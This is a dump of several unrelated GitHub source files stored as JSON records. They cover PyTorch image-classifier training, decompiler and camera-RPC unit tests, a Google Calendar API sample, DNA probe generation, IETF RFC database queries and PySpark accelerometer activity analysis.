TEST_DATA_PATH,\n transform = transforms.Compose([ReSize((256, 256)),\n ImCrop(224),\n TensorConv()]))\ntest_data_loader = data.DataLoader(transformed_test_dataset,\n batch_size=BATCH_SIZE, \n shuffle=True, \n num_workers=1)\n\n\nprint(\"=\"*50)\n\nif __name__ == '__main__':\n\n print(\"Number of train samples: \", len(transformed_dataset))\n print(\"Number of test samples: \", len(transformed_test_dataset))\n print(\"Detected Classes are: \", transformed_dataset.class_to_idx) # classes are detected by folder structure\n class_dict = transformed_dataset.class_to_idx\n class_dict_reverse = {v: k for k, v in class_dict.items()}\n class_dict.update(class_dict_reverse)\n save_dict(class_dict, 'class_label_dict')\n\n model = nw.multi_label_vgg_model(training=True).to(device)\n optimizer = torch.optim.Adam([{'params': model.features.parameters()}, {'params': model.classifier.parameters(), 'lr': 1e-6}], lr=1e-7)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer, mode='min', patience=5, verbose=True)\n loss_func = nn.BCEWithLogitsLoss()\n\n # Training and Testing\n train_loss_list = []\n test_loss_list = []\n start_time = datetime.datetime.now()\n for epoch in range(EPOCHS):\n model = model.train()\n print(\"Epoch No: \", epoch + 1)\n running_loss = 0.0\n for step_train, train_sample_batched in enumerate(train_data_loader):\n images_batch, labels_batch = train_sample_batched['image'], train_sample_batched['comp_vector']\n images_batch = images_batch.to(device)\n labels_batch = labels_batch.to(device)\n optimizer.zero_grad()\n output = model(images_batch)\n loss = loss_func(output, labels_batch) \n loss.backward() \n optimizer.step()\n running_loss += loss.item()\n if step_train > 0:\n train_loss_list.append(running_loss / step_train)\n print('[%d] Epoch loss: %.6f' %\n (epoch + 1, running_loss / step_train))\n \n test_running_loss 
= 0.0\n accuracy_prd_list = []\n accuracy_inp_list = []\n for step_test, test_sample_batched in enumerate(test_data_loader):\n model=model.eval()\n test_inputs, test_labels = test_sample_batched['image'], test_sample_batched['comp_vector']\n test_inputs = test_inputs.cuda()\n test_labels = test_labels.cuda()\n test_output = model(test_inputs)\n test_loss = loss_func(test_output, test_labels)\n test_running_loss += test_loss.item()\n test_output[test_output > 0] = 1\n test_output[test_output < 0] = 0\n accuracy_prd_list.extend(test_output.cpu().tolist())\n accuracy_inp_list.extend(test_labels.cpu().tolist())\n test_loss = 0.0\n test_loss_list.append(test_running_loss/step_test)\n scheduler.step(test_running_loss)\n print('[%d] Valid loss: %.6f' %\n (epoch + 1, test_running_loss/step_test))\n accuracy_prd_list = [item for sublist in accuracy_prd_list for item in sublist]\n accuracy_inp_list = [item for sublist in accuracy_inp_list for item in sublist]\n test_accuracy = []\n for i in range(len(accuracy_prd_list)):\n if accuracy_prd_list[i] == accuracy_inp_list[i]:\n test_accuracy.append(1)\n else:\n test_accuracy.append(0)\n print('[%d] Valid accuracy: %.2f' %\n (epoch + 1, round(100 * sum(test_accuracy)/len(accuracy_inp_list), 2)))\n print(\"=\"*50)\n print(\" \"*50)\nfinish_time = datetime.datetime.now()\ntime_diff = finish_time - start_time\nprint (\"Training time: \", divmod(time_diff.total_seconds(), 60))\ntorch.save(model.state_dict(), 'model/model_single_v' + str(VERSION) + '.pt')\n# Create count of the number of epochs\nepoch_count = range(1, len(train_loss_list) + 1)\n\n# Visualize loss history\nplt.plot(epoch_count, train_loss_list, 'r--')\nplt.plot(epoch_count, test_loss_list, 'b-')\nplt.legend(['Training Loss', 'Test Loss'])\nplt.xlabel('Epoch')\nplt.ylabel('Loss')\nplt.savefig('/home/anup/work/multilabel/losses/' + str(VERSION) + '.jpg')\nplt.show()\n\n\n\n \n","repo_name":"anupkhalam/Damage-Detection-Demo","sub_path":"train_01.py","file_name":"train_01.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
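The training loop in the record above averages `running_loss` over `step_train`, the zero-based index of the last batch, so the reported epoch loss divides by N-1 rather than by the number of batches. A minimal sketch of per-epoch mean-loss bookkeeping, assuming generic `loader`, `model`, `criterion` and `optimizer` objects rather than the ones defined in that record:

```python
def train_one_epoch(model, loader, criterion, optimizer, device):
    """Run one epoch and return the mean loss over all batches."""
    model.train()
    running_loss = 0.0
    for inputs, targets in loader:
        inputs, targets = inputs.to(device), targets.to(device)
        optimizer.zero_grad()
        loss = criterion(model(inputs), targets)
        loss.backward()
        optimizer.step()
        running_loss += loss.item()
    # Divide by the number of batches, not by the last batch index.
    return running_loss / len(loader)
```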
+{"seq_id":"37400709017","text":"from regression_tests import *\n\nclass TestBase(Test):\n def test_produce_expected_output(self):\n self.assert_c_produces_output_when_run(\n input='1 2 3',\n expected_return_code=4,\n expected_output='XYZ\\n'\n )\n self.assert_c_produces_output_when_run(\n input='0 10 0',\n expected_return_code=3,\n expected_output='XY\\n'\n )\n\nclass Test_2018(TestBase):\n settings_2018 = TestSettings(\n input=files_in_dir('2018-09-17', excluding=r'.*\\.exe'),\n )\n\nclass Test_2018_x64Pe(Test):\n settings_2018 = TestSettings(\n input=files_in_dir('2018-09-17', matching=r'.*\\.exe'),\n )\n\n def test_check_function_func(self):\n assert self.out_c.has_func('func')\n func = self.out_c.funcs['func']\n assert func.return_type.is_int(32)\n assert func.param_count == 0\n assert func.has_any_if_stmts()\n assert func.has_any_return_stmts()\n assert func.calls('scanf')\n assert func.calls('printf') or func.calls('puts')\n if func.calls('printf'):\n assert self.out_c.has_string_literal('XYZ\\\\n')\n assert self.out_c.has_string_literal('XY\\\\n')\n assert self.out_c.has_string_literal('X\\\\n')\n\n elif func.calls('puts'):\n assert self.out_c.has_string_literal('XYZ')\n assert self.out_c.has_string_literal('XY')\n assert self.out_c.has_string_literal('X')\n\n def test_check_funcion_main(self):\n assert self.out_c.has_func('main')\n assert self.out_c.funcs['main'].calls('func')\n assert self.out_c.funcs['main'].has_any_return_stmts()\n assert len(self.out_c.funcs['main'].return_stmts) == 1\n\n def test_check_presence_of_literals(self):\n assert self.out_c.has_string_literal('%d %d %d')\n\nclass Test_2017(TestBase):\n settings_2017 = TestSettings(\n input=files_in_dir('2017-11-14'),\n )\n\nclass Test_2015(TestBase):\n settings_2015 = TestSettings(\n input=files_in_dir('2015-03-30'),\n )\n","repo_name":"avast/retdec-regression-tests","sub_path":"integration/nested-if-returns/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"}
+{"seq_id":"32191744759","text":"from unittest import TestCase\ntry:\n from source import O2x5xxRPCDevice\n from tests.utils import *\n from .config import *\nexcept ModuleNotFoundError:\n import os\n import sys\n sys.path.insert(0, '../source')\n from utils import *\n from config import *\nimport numpy as np\nimport warnings\nimport time\n\n\nclass TestRPC_MainAPI(TestCase):\n rpc = None\n session = None\n config_backup = None\n active_application_backup = None\n pin_layout = None\n\n @classmethod\n def setUpClass(cls):\n cls.rpc = O2x5xxRPCDevice(deviceAddress)\n cls.session = cls.rpc.requestSession()\n cls.config_backup = cls.session.exportConfig()\n cls.active_application_backup = cls.rpc.getParameter(\"ActiveApplication\")\n configFile = getImportSetupByPinLayout(rpc=cls.rpc)['config_file']\n configFile = cls.session.readConfigFile(configFile=configFile)\n cls.session.importConfig(configFile, global_settings=True, network_settings=False, applications=True)\n cls.rpc.switchApplication(1)\n\n @classmethod\n def tearDownClass(cls):\n cls.session.importConfig(cls.config_backup, global_settings=True, network_settings=False, applications=True)\n if cls.active_application_backup != \"0\":\n cls.rpc.switchApplication(cls.active_application_backup)\n cls.session.cancelSession()\n\n def setUp(self):\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed.*\")\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed \")\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed running multiprocessing pool.*>\")\n self.rpc.switchApplication(1)\n\n def test_getParameter(self):\n result = self.rpc.getParameter(value=\"DeviceType\")\n self.assertIsInstance(result, str)\n self.assertEqual(len(result), 5)\n\n def test_getAllParameters(self):\n result = self.rpc.getAllParameters()\n self.assertIsInstance(result, dict)\n\n def test_getSWVersion(self):\n result = self.rpc.getSWVersion()\n self.assertIsInstance(result, dict)\n\n def test_getHWInfo(self):\n result = self.rpc.getHWInfo()\n self.assertIsInstance(result, dict)\n\n def test_getDmesgData(self):\n result = self.rpc.getDmesgData()\n self.assertIsInstance(result, str)\n\n def test_getClientCompatibilityList(self):\n result = self.rpc.getClientCompatibilityList()\n self.assertIsInstance(result, list)\n\n def test_getApplicationList(self):\n result = self.rpc.getApplicationList()\n self.assertIsInstance(result, list)\n self.assertIsInstance(result[0], dict)\n self.assertIsInstance(result[1], dict)\n self.assertIsInstance(result[2], dict)\n self.assertIsInstance(result[3], dict)\n self.assertIsInstance(result[4], dict)\n self.assertIsInstance(result[5], dict)\n\n def test_switchApplication(self):\n initial_application = int(self.rpc.getParameter(\"ActiveApplication\"))\n if initial_application > 1:\n self.rpc.switchApplication(applicationIndex=1)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 1)\n else:\n self.rpc.switchApplication(applicationIndex=2)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 2)\n time.sleep(5)\n # Switch back to initial application\n self.rpc.switchApplication(applicationIndex=initial_application)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 
initial_application)\n\n def test_getTraceLogs(self):\n numberLogs = 10\n traces = self.rpc.getTraceLogs(nLogs=numberLogs)\n self.assertIsInstance(traces, list)\n self.assertEqual(len(traces), numberLogs)\n\n def test_getApplicationStatisticData(self):\n application_active = self.rpc.getParameter(value=\"ActiveApplication\")\n result = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n self.assertIsInstance(result, dict)\n\n def test_getReferenceImage(self):\n result = self.rpc.getReferenceImage()\n self.assertIsInstance(result, np.ndarray)\n\n def test_isConfigurationDone(self):\n result = self.rpc.isConfigurationDone()\n self.assertTrue(result)\n\n def test_waitForConfigurationDone(self):\n self.rpc.waitForConfigurationDone()\n\n def test_measure(self):\n input_measure_line = {\n \"geometry\": \"line\",\n \"pixel_positions\": [\n {\n \"column\": 980,\n \"row\": 374\n },\n {\n \"column\": 603,\n \"row\": 455\n }\n ]\n }\n\n input_measure_rect = {\n \"geometry\": \"rect\",\n \"pixel_positions\": [\n {\n \"column\": 376,\n \"row\": 426\n },\n {\n \"column\": 710,\n \"row\": 651\n }\n ]\n }\n\n input_measure_circle = {\n \"geometry\": \"circle\",\n \"pixel_positions\": [\n {\n \"column\": 647,\n \"row\": 452\n },\n {\n \"column\": 775,\n \"row\": 533\n }\n ]\n }\n\n result = self.rpc.measure(measureInput=input_measure_line)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n result = self.rpc.measure(measureInput=input_measure_rect)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n result = self.rpc.measure(measureInput=input_measure_circle)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n\n def test_trigger(self):\n number_trigger = 100\n application_active = self.rpc.getParameter(value=\"ActiveApplication\")\n initial_application_stats = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n initial_number_of_frames = initial_application_stats['number_of_frames']\n for i in range(number_trigger):\n answer = self.rpc.trigger()\n self.assertTrue(answer)\n application_stats = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n number_of_frames = application_stats['number_of_frames']\n self.assertEqual(number_of_frames, initial_number_of_frames + number_trigger)\n\n def test_doPing(self):\n result = self.rpc.doPing()\n self.assertEqual(result, \"up\")\n","repo_name":"ifm/o2x5xx-python","sub_path":"tests/test_rpc.py","file_name":"test_rpc.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"}
+{"seq_id":"4848876608","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Copyright 2014 Google Inc. All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"Simple command-line sample for the Calendar API.\r\nCommand-line application that retrieves the list of the user's calendars.\"\"\"\r\n\r\nimport sys\r\n\r\nfrom oauth2client import client\r\nfrom googleapiclient import sample_tools\r\n\r\nimport datetime\r\n\r\n_calendar_id = 'mamie.lora06@gmail.com'\r\n_found_calendar = None\r\n\r\n\r\ndef main(argv):\r\n # Authenticate and construct service.\r\n service, flags = sample_tools.init(\r\n argv, 'calendar', 'v3', __doc__, __file__,\r\n scope='https://www.googleapis.com/auth/calendar.readonly')\r\n\r\n try:\r\n page_token = None\r\n \r\n \r\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\r\n print('Getting the upcoming 10 events')\r\n eventsResult = service.events().list(\r\n calendarId='primary', timeMin=now, maxResults=10, singleEvents=True,\r\n orderBy='startTime').execute()\r\n \r\n events = eventsResult.get('items', [])\r\n\r\n if not events:\r\n print('No upcoming events found.')\r\n for event in events:\r\n start = event['start'].get('dateTime', event['start'].get('date'))\r\n print(start, event['summary'])\r\n\r\n \r\n while True:\r\n calendar_list = service.calendarList().list(\r\n pageToken=page_token).execute()\r\n for calendar_list_entry in calendar_list['items']:\r\n \r\n print(calendar_list_entry['summary'])\r\n \r\n calendarId = calendar_list_entry['id']\r\n if calendarId == _calendar_id:\r\n _found_calendar = calendar_list_entry\r\n break\r\n \r\n \r\n page_token = calendar_list.get('nextPageToken')\r\n if not page_token:\r\n break\r\n \r\n _found_calendar\r\n \r\n except client.AccessTokenRefreshError:\r\n print('The credentials have been revoked or expired, please re-run'\r\n 'the application to re-authorize.')\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)","repo_name":"MamieLora/TOCS2017","sub_path":"KeeeXClient/src/GoogleCalendarClient/ListEvents.py","file_name":"ListEvents.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"25852159732","text":"\"\"\"Functions for generating lists of candidate probes from sequences.\n\nThese functions compute lists of many (likely redundant) probes, termed\ncandidate probes, from a sequence of list of sequences.\n\"\"\"\n\nimport logging\nimport re\nimport sys\n\nimport numpy as np\n\nfrom catch import probe\nfrom catch.utils import seq_io\n\n__author__ = 'Hayden Metsky '\n\nlogger = logging.getLogger(__name__)\n\n\ndef make_candidate_probes_from_sequence(seq,\n probe_length,\n probe_stride,\n min_n_string_length=2,\n allow_small_seqs=None):\n \"\"\"Generate a list of candidate probes from a sequence.\n\n It is possible (especially when there are strings of N's) that\n duplicate probes are returned.\n\n Args:\n seq: sequence as a string or np.array from which to generate\n candidate probes\n probe_length: generate candidate probes with this number of bp\n probe_stride: generate probes from seq separated by this number\n of bp\n min_n_string_length: possible probes that would contain strings\n of this number or more N's are discarded and, instead, new\n probes flanking the string are added\n allow_small_seqs: if set, allow sequences that are smaller than the\n probe length by creating candidate probes equal to the sequence;\n the value gives the minimum allowed probe (sequence) length\n\n Returns:\n list of candidate probes as instances of probe.Probe\n \"\"\"\n n_string_query = re.compile('(N{' + str(min_n_string_length) + ',})')\n\n if len(seq) < probe_length:\n if allow_small_seqs:\n if len(seq) < allow_small_seqs:\n raise ValueError((\"Allowing sequences smaller than the probe \"\n \"length (\" + str(probe_length) + \"), but \"\n \"input sequence is smaller than minimum \"\n \"allowed length\"))\n else:\n if n_string_query.search(seq):\n raise Exception((\"Only possible probe from input \"\n \"sequence has too long a stretch of N's\"))\n else:\n # Make a probe equal to this sequence\n return [probe.Probe.from_str(seq)]\n else:\n raise ValueError((\"An input sequence is smaller than the probe \"\n \"length (\" + str(probe_length) + \"); try \"\n \"setting --small-seq-skip\"))\n\n if isinstance(seq, np.ndarray):\n seq = ''.join(seq)\n\n # Make a probe based on the subsequence seq[start:end].\n # Namely, if that subsequence contains no string of N's, then it\n # is a probe to be added and the probe is returned in a single-\n # valued list. Otherwise, an empty list is returned.\n def add_probe_from_subsequence(start, end,\n is_flanking_n_string=False):\n subseq = seq[start:end]\n probes = []\n\n # Search for strings of min_n_string_length or more N's in subseq\n # and only add a probe if there is not such a string\n if not n_string_query.search(subseq):\n # There's no string of N's, so this subsequence is a valid\n # probe\n probes += [subseq]\n\n # Convert the probes from a Python list of Python strings to a\n # list of probe.Probe\n probes = [probe.Probe.from_str(p) for p in probes]\n for p in probes:\n p.is_flanking_n_string = is_flanking_n_string\n\n return probes\n\n # Populate a list of probes\n probes = []\n for start in np.arange(0, len(seq), probe_stride):\n if start + probe_length > len(seq):\n break\n probes += add_probe_from_subsequence(start, start + probe_length)\n\n if len(seq) % probe_stride != 0:\n # There are bases on the right that were never covered, so add\n # another probe for this\n probes += add_probe_from_subsequence(len(seq) - probe_length,\n len(seq))\n\n # Add probes flanking each string of N's. 
Specifically, add a probe\n # to the left of a string and to the right. The called function\n # must check that the flanking probe does not contain a string of\n # N's before adding. (Don't recursively chase flanking probes.)\n for match in n_string_query.finditer(seq):\n if match.start() - probe_length >= 0:\n # Add the left flanking probe for match\n probes += add_probe_from_subsequence(match.start() - probe_length,\n match.start(),\n is_flanking_n_string=True)\n if match.end() + probe_length <= len(seq):\n # Add the right flanking probe for match\n probes += add_probe_from_subsequence(match.end(),\n match.end() + probe_length,\n is_flanking_n_string=True)\n\n return probes\n\n\ndef make_candidate_probes_from_sequences(\n seqs,\n probe_length,\n probe_stride,\n min_n_string_length=2,\n allow_small_seqs=None,\n seq_length_to_skip=None):\n \"\"\"Generate a list of candidate probes from a list of sequences.\n\n It is possible (perhaps even likely depending on where\n the sequences come from) that duplicate probes are returned.\n\n Args:\n seqs: list of sequences, each as a string or np.array from which\n to generate candidate probes\n probe_length: generate candidate probes with this number of bp\n probe_stride: generate probes from each sequence separated by this\n number of bp\n min_n_string_length: possible probes that would contain strings\n of this number or more N's are discarded and, instead, new\n probes flanking the string are added\n allow_small_seqs: if set, allow sequences that are smaller than the\n probe length by creating candidate probes equal to the sequence;\n the value gives the minimum allowed probe (sequence) length\n seq_length_to_skip: if set, skip sequences whose length is <=\n the given value (i.e., do not design candidate probes for\n them)\n\n Returns:\n list of candidate probes as instances of probe.Probe\n \"\"\"\n if not isinstance(seqs, list):\n raise TypeError(\"seqs must be a list of sequences\")\n if len(seqs) == 0:\n raise ValueError(\"seqs must have at least one sequence\")\n for seq in seqs:\n if not isinstance(seq, str):\n raise TypeError(\"seqs must be a list of Python strings\")\n\n probes = []\n for seq in seqs:\n if seq_length_to_skip is not None:\n if len(seq) <= seq_length_to_skip:\n logger.info((\"Not designing candidate probes for a \"\n \"sequence with length %d, since it is <= %d\"),\n len(seq), seq_length_to_skip)\n continue\n\n probes += make_candidate_probes_from_sequence(\n seq,\n probe_length=probe_length,\n probe_stride=probe_stride,\n min_n_string_length=min_n_string_length,\n allow_small_seqs=allow_small_seqs)\n\n return probes\n","repo_name":"broadinstitute/catch","sub_path":"catch/filter/candidate_probes.py","file_name":"candidate_probes.py","file_ext":"py","file_size_in_byte":7463,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"36"}
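The `make_candidate_probes_from_sequence` docstring above describes the stride-based tiling and the handling of N-strings; a short usage sketch, assuming the `catch` package is importable and using a made-up toy sequence:

```python
from catch.filter.candidate_probes import make_candidate_probes_from_sequence

seq = 'ATCG' * 40 + 'NN' + 'GGCA' * 40  # toy sequence with one N-string
probes = make_candidate_probes_from_sequence(
    seq, probe_length=100, probe_stride=50, min_n_string_length=2)
# Probes spanning the N-string are dropped; probes flanking it are added
# and marked with is_flanking_n_string = True.
print(len(probes), sum(p.is_flanking_n_string for p in probes))
```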
+{"seq_id":"36386987899","text":"#!/usr/bin/env python3\nfrom ietf.sql.bcp import Bcp\nfrom ietf.sql.fyi import Fyi\nfrom ietf.sql.rfc import Rfc\nfrom ietf.sql.rfc_not_issued import RfcNotIssued\nfrom ietf.sql.std import Std\nfrom ietf.xml.enum import DocumentType\n\n\ndef query_rfc(session, number):\n row = session.query(Rfc).\\\n filter(Rfc.id == number).\\\n one_or_none()\n return row\n\n\ndef query_rfc_updates(session, number):\n \"\"\"Return the most up-to-date document for RFC `number`.\"\"\"\n orig = query_rfc(session, number)\n # If there are no updates then return the original\n if (orig is None) or (not orig.updated_by):\n return orig\n # Else return the latest document\n else:\n update_doc = orig.updated_by[-1]\n update_type = update_doc.doc_type\n update_id = update_doc.doc_id\n if update_type is DocumentType.RFC:\n return query_rfc(session, update_id)\n elif update_type is DocumentType.STD:\n return query_std(session, update_id)\n elif update_type is DocumentType.BCP:\n return query_bcp(session, update_id)\n elif update_type is DocumentType.FYI:\n return query_fyi(session, update_id)\n else:\n return orig\n\n\ndef query_rfc_obsoletes(session, number):\n \"\"\"Return the latest RFC that obsoletes `number` if such an RFC exists,\n otherwise return RFC `number`.\"\"\"\n # Lookup RFC `number`\n cur_rfc = query_rfc(session, number)\n # If there is no updated_by then return the original\n if (cur_rfc is None) or (not cur_rfc.obsoleted_by):\n return cur_rfc\n # Else recurse\n else:\n obsoleting_id = cur_rfc.obsoleted_by[-1].doc_id\n return query_rfc_obsoletes(session, obsoleting_id)\n\n\ndef query_rfc_see_also(session, number):\n return None\n\n\ndef query_rfc_not_issued(session, number):\n \"\"\"Return an RfcNotIssued object or None.\"\"\"\n row = session.query(RfcNotIssued).\\\n filter(RfcNotIssued.id == number).\\\n one_or_none()\n return row\n\n\ndef query_std(session, number):\n row = session.query(Std).\\\n filter(Std.id == number).\\\n one_or_none()\n return row\n\n\ndef query_bcp(session, number):\n row = session.query(Bcp).\\\n filter(Bcp.id == number).\\\n one_or_none()\n return row\n\n\ndef query_fyi(session, number):\n row = session.query(Fyi).\\\n filter(Fyi.id == number).\\\n one_or_none()\n return row\n","repo_name":"lafrenierejm/ietf-cli","sub_path":"ietf/utility/query_doc.py","file_name":"query_doc.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"10705832440","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql import functions as F\nfrom datetime import datetime, timedelta\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.types import TimestampType\nfrom pyspark.sql.types import IntegerType\nimport datefinder\nimport time\n\n##########################################################################################################\n\ndef queryrows(df, string):\n \"\"\"\n Select the rows which match a given string.\n\n :param df:\n Spark DataFrame object containing the accelerometer raw data\n :param string:\n matching string\n :return:\n Spark DataFrame object with filtered values\n \"\"\"\n\n filter_value = df.schema.names[0] + \" like '%\" + string + \"%'\"\n\n return df.filter(filter_value).collect()[0][0]\n\n\n##########################################################################################################\n\ndef gen_acc_dataframe(df, ts_name):\n \"\"\"\n Generate accelerometer DataFrame from raw data with timestamp column.\n\n :param df:\n Spark DataFrame object containing the accelerometer raw data\n :param ts_name:\n name of timestamp column\n :return:\n input data epoch, Spark DataFrame object with timestamp data\n \"\"\"\n\n ## extract metadata from RDD object\n start_date = queryrows(df, 'Start Date').split()[2]\n start_time = queryrows(df, 'Start Time').split()[2]\n interval = queryrows(df, 'Period').split()[3]\n dateformat = queryrows(df, 'Data File Created By').split()\n\n if len(dateformat) < 14:\n\n dt = datefinder.find_dates(start_date + \" \" + start_time)\n start_timestamp = [ts for ts in dt][0]\n\n else:\n\n date_dict = {'M/d/yyyy': ['%m/%d/%Y', '%m/%d/%Y'],\n 'dd-MMM-yy': ['%d/%m/%Y', '%d-%b-%y'],\n 'dd-MM-yyyy': ['%d/%m/%Y', '%d-%m-%Y'],\n 'dd/MM/yyyy': ['%d/%m/%Y', '%d/%m/%Y']\n }\n\n dt = dateformat[13]\n datetime_format = [date_dict[dt][0] + ' %H:%M:%S', date_dict[dt][1] + ' %H:%M:%S']\n start_timestamp = datetime.strptime(start_date + \" \" + start_time, datetime_format[0])\n\n x = time.strptime(interval, '%H:%M:%S')\n\n interval_sec = timedelta(hours=x.tm_hour, minutes=x.tm_min, seconds=x.tm_sec)\n\n ## extract accelerometer data from RDD object\n acc_data = df.filter(\"not value like '%Current%'\")\n acc_data = acc_data.filter(\"not value like '%Axis%'\")\n acc_data = acc_data.filter(\"value like '%,%'\") # TODO: change 'value' as 'df.schema.names[0]'\n acc_data = acc_data.cache()\n acc_data = acc_data.checkpoint()\n acc_data.count()\n acc_data = acc_data.selectExpr('value as acc_data') # change column name to 'acc_data'\n acc_data = acc_data.withColumn('id', F.monotonically_increasing_id())\n\n app_fun = F.udf(lambda k: start_timestamp + k * interval_sec, TimestampType())\n\n acc_data = acc_data.withColumn(ts_name, app_fun(acc_data['id'])).select([ts_name, 'acc_data'])\n\n return interval_sec.seconds, acc_data\n\n\n##########################################################################################################\n\ndef split_acc_data(df, col_list):\n \"\"\"\n Reads string of data from accelerometer DataFrame.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param col_list:\n list of feature names matching accelerometer data\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df = df.cache()\n df = df.checkpoint()\n df.count()\n\n cols = F.split(df['acc_data'], r',')\n\n for k, item in enumerate(col_list):\n df = df.withColumn(item, cols.getItem(k).cast(dataType=IntegerType()))\n\n df = df.drop('acc_data')\n\n return 
df\n\n\n##########################################################################################################\n\ndef activity_count(df, datetime_col, interval, LightCO, ModerateCO, HardCO, VeryHardCO, incl_acc=False):\n \"\"\"\n Return activity count calculated from accelerometer data.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param datetime_col:\n column with timestamp data\n :param interval:\n epoch duration (in seconds)\n :param LightCO:\n light activity cutoff value\n :param ModerateCO:\n moderate activity cutoff value\n :param HardCO:\n hard activity cutoff value\n :param VeryHardCO:\n very hard activity cutoff value\n :param incl_acc:\n if true, all raw accelerometer data are included in the DataFrame\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df = df.cache()\n df = df.checkpoint()\n df.count()\n\n cols = df.columns\n\n app_fun = F.udf(lambda x: activity_index(x, interval, LightCO, ModerateCO, HardCO, VeryHardCO))\n\n ## use the axis1 or vectMag to determine the activity count\n df = df.withColumn('activity', F.col(cols[1]))\n\n df = df.withColumn('activityIntensity', app_fun(df['activity'])).orderBy(datetime_col)\n\n cols.insert(1, 'activity')\n\n cols.insert(2, 'activityIntensity')\n\n if not incl_acc:\n\n df = df.select(cols[0:3]).orderBy(datetime_col)\n\n else:\n\n df = df.select(cols).orderBy(datetime_col)\n\n return df\n\n\n##########################################################################################################\n\ndef activity_index(AC, interval, LightCO, ModerateCO, HardCO, VeryHardCO):\n \"\"\"\n Calculate activity intensity level using Freedson adult cut points (Freedson, Melanson, & Sirard, 1998).\n\n :param AC:\n activity count per epoch\n :param interval:\n epoch duration (in seconds)\n :param LightCO:\n light activity cutoff value\n :param ModerateCO:\n moderate activity cutoff value\n :param HardCO:\n hard activity cutoff value\n :param VeryHardCO:\n very hard activity cutoff value\n :return:\n integer value corresponding to the activity intensity\n \"\"\"\n\n ## assume epoch smaller than 1 minute\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n\n ## normalize the cutoffs per epoch\n n = 60 / interval\n VeryHardCO = VeryHardCO / n\n HardCO = HardCO / n\n ModerateCO = ModerateCO / n\n LightCO = LightCO / n\n\n if AC == -1:\n act_index = -1 # state unknown\n elif AC == -2:\n act_index = -2 # not wearing device\n elif 0 <= AC < LightCO:\n act_index = 0 # sedentary\n elif LightCO <= AC < ModerateCO:\n act_index = 1 # light activity\n elif ModerateCO <= AC < HardCO:\n act_index = 2 # moderate activity\n elif HardCO <= AC < VeryHardCO:\n act_index = 3 # hard activity\n else:\n act_index = 4 # very hard activity\n\n return act_index\n\n\n##########################################################################################################\n### NOT USED ###\ndef datetime_filter(df, param_name, param_value, datetime_name, time_w=90, step=90 * 60):\n \"\"\"\n Remove rows in DataFrame which match a condition within a given time interval.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param param_name:\n parameter name\n :param param_value:\n parameter value for conditional statement\n :param datetime_name:\n column with timestamp data\n :param time_w:\n tumbling window duration (in minutes)\n :param step:\n sliding interval (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## tumbling window size\n tw = str(time_w) + ' minutes'\n\n ## sliding window 
size\n sw = str(step) + ' seconds'\n\n ## offset (in seconds)\n offset = str(0) + ' seconds'\n\n intervals_df = df.groupBy(F.window(datetime_name, '{}'.format(tw), '{}'.format(sw), '{}'.format(offset))) \\\n .avg(param_name) \\\n .sort('window.start') \\\n .filter(F.col('avg({})'.format(param_name)) == param_value) \\\n .select('window') \\\n .withColumn('start', F.col('window').start) \\\n .withColumn('end', F.col('window').end) \\\n .drop('window')\n\n \"\"\"\n schema of internal_df:\n \n root\n |-- start: timestamp (nullable = true)\n |-- end: timestamp (nullable = true)\n \"\"\"\n\n ## transform dataframe into list of pyspark.sql.types.Row objects\n intervals_list = intervals_df.collect()\n\n ## filter dataframe excluding the selected intervals\n for row in intervals_list:\n df = df.filter(~F.col(datetime_name).between(row[0], row[1]))\n\n return intervals_df, df\n\n\n##########################################################################################################\n### NOT USED ###\ndef start_time_offset(df):\n \"\"\"\n Return the offset to start a tumbling window from the first timestamp of the DataFrame.\n\n :param df:\n Spark 